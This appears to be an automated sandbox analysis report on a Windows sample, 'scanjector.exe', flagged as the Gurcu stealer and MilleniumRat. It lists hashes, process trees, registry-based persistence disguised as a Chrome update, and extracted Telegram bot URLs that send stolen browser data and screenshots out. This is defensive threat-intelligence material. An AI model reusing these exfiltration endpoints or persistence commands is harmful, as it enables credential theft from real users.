Analysis
-
max time kernel
96s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-12-2024 02:45
Static task
static1
Behavioral task
behavioral1
Sample
scanjector.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
scanjector.exe
Resource
win10v2004-20241007-en
General
-
Target
scanjector.exe
-
Size
17.4MB
-
MD5
00a089806c6d881d0716d38ca3f26f1f
-
SHA1
14e6f87e781dfef16566cc0c85e7a1c2ce578bad
-
SHA256
0c374469d4e9f2f0036e48f61c821e23416e41111792fa35e215886f3c0d5c46
-
SHA512
5440ee4137d2415657dce424b98a15b44d07bf7784ec2fb07a7328bfe2a5a76a4d8cada61f9669ee4477e69d2e5ef752cd147c84f9523868c6690d82c9c3192d
-
SSDEEP
393216:f/hnALfhy7zZYOY3iWkvdCsJjQ2SHjNKED9UQr:3pAjhyHZ+33o820rUQr
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/sendDocument?chat_id=-4770872927&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/sendMessage?chat_id=-4770872927
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/getUpdates?offset=-
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/sendDocument?chat_id=-4770872927&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation scanjector.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation system32.dll.exe -
Executes dropped EXE 3 IoCs
pid Process 4420 system32.dll.exe 4788 main.exe 4424 Update.exe -
Loads dropped DLL 2 IoCs
pid Process 4420 system32.dll.exe 4424 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com 24 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4716 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2912 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2100 reg.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4420 system32.dll.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe 4424 Update.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4420 system32.dll.exe Token: SeDebugPrivilege 4716 tasklist.exe Token: SeDebugPrivilege 4424 Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4424 Update.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4816 wrote to memory of 4420 4816 scanjector.exe 83 PID 4816 wrote to memory of 4420 4816 scanjector.exe 83 PID 4816 wrote to memory of 4788 4816 scanjector.exe 84 PID 4816 wrote to memory of 4788 4816 scanjector.exe 84 PID 4420 wrote to memory of 2136 4420 system32.dll.exe 86 PID 4420 wrote to memory of 2136 4420 system32.dll.exe 86 PID 2136 wrote to memory of 5112 2136 cmd.exe 88 PID 2136 wrote to memory of 5112 2136 cmd.exe 88 PID 2136 wrote to memory of 4716 2136 cmd.exe 89 PID 2136 wrote to memory of 4716 2136 cmd.exe 89 PID 2136 wrote to memory of 1132 2136 cmd.exe 90 PID 2136 wrote to memory of 1132 2136 cmd.exe 90 PID 2136 wrote to memory of 2912 2136 cmd.exe 92 PID 2136 wrote to memory of 2912 2136 cmd.exe 92 PID 2136 wrote to memory of 4424 2136 cmd.exe 93 PID 2136 wrote to memory of 4424 2136 cmd.exe 93 PID 4424 wrote to memory of 3448 4424 Update.exe 98 PID 4424 wrote to memory of 3448 4424 Update.exe 98 PID 3448 wrote to memory of 2100 3448 cmd.exe 100 PID 3448 wrote to memory of 2100 3448 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\scanjector.exe"C:\Users\Admin\AppData\Local\Temp\scanjector.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Users\Admin\AppData\Roaming\system32.dll.exe"C:\Users\Admin\AppData\Roaming\system32.dll.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB6DC.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB6DC.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:5112
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4420"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:1132
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:2912
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f5⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:2100
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\main.exe"C:\Users\Admin\AppData\Roaming\main.exe"2⤵
- Executes dropped EXE
PID:4788
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
286B
MD5e1d8879ce0f0778b15baf6a3fb3e43f6
SHA13ee56ba2674d38bb54c537c4855649bf1ed33adf
SHA2561025bc9a099e638001eccd885db321a428debaaeb495fccc7d92c3b5a90a1002
SHA5128b89d2f230f14685f96b412d4085a8c00f214fb490ceb7fcbacbeaf5410e921a11186295302a376d602b4730e3330ed02a6e034a1b56b0b692ab51cdc9cec96c
-
Filesize
11.8MB
MD5b9f6832045d1ebb340a01e97900bf7ed
SHA17b0b6aa8fd7cc55048443f4499da14b4fbeed466
SHA25649b140137989de837736c23b3b095063c8fa30fd22bfe12b4282326ca431cd12
SHA51231acdb392db706d8d188c1aba5452783a7482109024afd6dcf23e2eba00872b0ed9d86e128a5393a479e89cc657f4b9bf6bbbda76e6b360b426be58b8f53a912
-
Filesize
5.7MB
MD5587df5dee51ff841ea947719352dc993
SHA116595bb74e53f842f53677ef12d37e170b06a807
SHA256b8cec521e0f51803ed248b7e8ee6415339c34e92499265dd32aab678cb5e51c4
SHA5126c0ee1cd89c211daa6e4a2bf80c1e746c2879f93ab88891935a332af0763c373aed5e38ae511a190758765e5e146081d80bac10655b7bffe9d7231d0b6d959f1